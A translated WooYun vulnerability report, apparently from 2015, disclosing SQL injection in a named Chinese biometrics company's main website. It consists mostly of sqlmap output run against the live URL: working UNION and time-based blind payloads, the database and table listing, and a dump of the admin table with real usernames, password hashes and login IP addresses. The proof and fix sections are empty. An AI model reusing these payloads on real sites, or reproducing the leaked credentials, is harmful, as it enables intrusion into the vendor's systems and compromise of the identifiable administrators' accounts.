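Vulnerability summary
Vulnerability details
Disclosure status:
2015-08-28: Actively contacting the vendor and waiting for the vendor to claim the report; details are not public
2015-10-12: The vendor has actively ignored the vulnerability; details are disclosed to the public

Brief description:
天识科技 (SUPIDENT)
Shenzhen Tianshi Technology Co., Ltd. (深圳市天识科技有限公司) is the most influential supplier of products and services in China's information security and biometrics industry, and a core subsidiary of the China Academy of Science and Technology Development. Its "SUPIDENT/天识" brand is one of the most influential brands in China's information security and biometrics industry. The company's products have obtained a number of national patents, its full line of biometric products has fully independent intellectual property rights, and it holds the national information security engineering service qualification.
from: http://www.freebuf.com/jobs/75863.html   (a recruitment post...)
Detailed description:
Main site
http://www.supident.com/?f=show&catid=23&id=145  just run sqlmap against it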
sqlmap identified the following injection points with a total of 185 HTTP(s) requests:
---
Place: GET
Parameter: catid
    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: f=show&catid=23 LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a7871773a,0x7a4c437646777353486c,0x3a7066753a)#&id=145
    Vector:  UNION ALL SELECT NULL, [QUERY]#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: f=show&catid=23 AND SLEEP(5)&id=145
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
database management system users [1]:
[*] 'bdm0200082'@'%'
available databases [2]:
[*] bdm0200082_db
[*] information_schema
Database: bdm0200082_db
+-------------+---------+
| Table       | Entries |
+-------------+---------+
| jo2_file    | 199     |
| jo2_content | 106     |
| jo2_cate    | 26      |
| jo2_message | 5       |
| jo2_user    | 4       |
| jo2_admin   | 3       |
| jo2_link    | 2       |
| jo2_config  | 1       |
+-------------+---------+
Database: bdm0200082_db
Table: jo2_admin
[3 entries]
+--------+---------+---------+---------+---------+---------+----------+----------+----------+----------------------------------+------------+----------------+---------------+
| userid | prv     | bumen   | zhiwu   | email   | dianhua | username | disabled | fullname | password                         | logintimes | lastloginip    | lastlogintime |
+--------+---------+---------+---------+---------+---------+----------+----------+----------+----------------------------------+------------+----------------+---------------+
| 1      | <blank> | 客户支持部   | <blank> | <blank> | <blank> | admin    | 0        | 天识管理员    | 300343cb7bcf52581e96270be334fa61 | 352        | 115.71.5.205   | 1440494216    |
| 10     | 1       | 技术部     | 经理      | <blank> | <blank> | zonvon   | 0        | 小兵       | b8b186e835fbaec5bdd44d49fb4f5023 | 0          | NULL           | NULL          |
| 11     | Array   | <blank> | <blank> | <blank> | <blank> | duihao   | 0        | <blank>  | b8b186e835fbaec5bdd44d49fb4f5023 | 1          | 221.221.11.230 | 1315028821    |
+--------+---------+---------+---------+---------+---------+----------+----------+----------+----------------------------------+------------+----------------+---------------+
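You don't put any defenses on your own main site?
ok
Proof of vulnerability:
···
Fix:
···
Copyright notice: please credit the source when reposting: 爱上平顶山@乌云 (WooYun)
Vulnerability response
Vendor response:
Unable to contact the vendor, or the vendor actively refused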